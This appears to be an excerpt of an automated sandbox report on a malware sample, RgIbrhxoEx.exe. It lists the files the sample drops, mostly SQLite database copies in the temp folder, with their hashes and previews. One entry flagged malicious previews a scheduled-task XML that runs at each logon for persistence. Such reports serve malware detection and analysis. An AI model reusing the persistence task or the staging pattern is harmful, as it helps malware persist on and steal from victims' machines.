                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp3850.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):98304
                    Entropy (8bit):0.08235737944063153
                    Encrypted:false
                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp3860.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):98304
                    Entropy (8bit):0.08235737944063153
                    Encrypted:false
                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp3B03.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:XML 1.0 document, ASCII text
                    Category:dropped
                    Size (bytes):1583
                    Entropy (8bit):5.106323257825316
                    Encrypted:false
                    SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtpaxvn:cgergYrFdOFzOzN33ODOiDdKrsuTpuv
                    MD5:39766B4AA3168A72ACCA756EA2737FE0
                    SHA1:099DABEC596D6157E46EF7C86E72B0B979F018EA
                    SHA-256:3947CB85CC890D9F03CB448E3466C6F66E861D72F550DEA44D39B0047725CF07
                    SHA-512:FE1DAA54774FC8643AA3B2DEA04D7D65B5A72C94FB941E840A1B330F62551379F7865B0593B21A7590FF17964C6C11F4C2383D4AAE888932A8C049FC4A4798F0
                    Malicious:true
                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                    C:\Users\user\AppData\Local\Temp\tmp465.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp486.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp4A6.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp4B6.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp4C7.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp4D8.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp4D9.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp539B.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp53CB.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp53DB.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp53FC.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp5E88.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:XML 1.0 document, ASCII text
                    Category:dropped
                    Size (bytes):1583
                    Entropy (8bit):5.106323257825316
                    Encrypted:false
                    SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtpaxvn:cgergYrFdOFzOzN33ODOiDdKrsuTpuv
                    MD5:39766B4AA3168A72ACCA756EA2737FE0
                    SHA1:099DABEC596D6157E46EF7C86E72B0B979F018EA
                    SHA-256:3947CB85CC890D9F03CB448E3466C6F66E861D72F550DEA44D39B0047725CF07
                    SHA-512:FE1DAA54774FC8643AA3B2DEA04D7D65B5A72C94FB941E840A1B330F62551379F7865B0593B21A7590FF17964C6C11F4C2383D4AAE888932A8C049FC4A4798F0
                    Malicious:false
                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                    C:\Users\user\AppData\Local\Temp\tmp5F40.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):51200
                    Entropy (8bit):0.8746135976761988
                    Encrypted:false
                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp5F51.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):51200
                    Entropy (8bit):0.8746135976761988
                    Encrypted:false
                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp5F61.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):51200
                    Entropy (8bit):0.8746135976761988
                    Encrypted:false
                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp5F72.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):51200
                    Entropy (8bit):0.8746135976761988
                    Encrypted:false
                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp5F73.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp5F83.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp5FA4.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp665D.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp666D.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp66AD.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
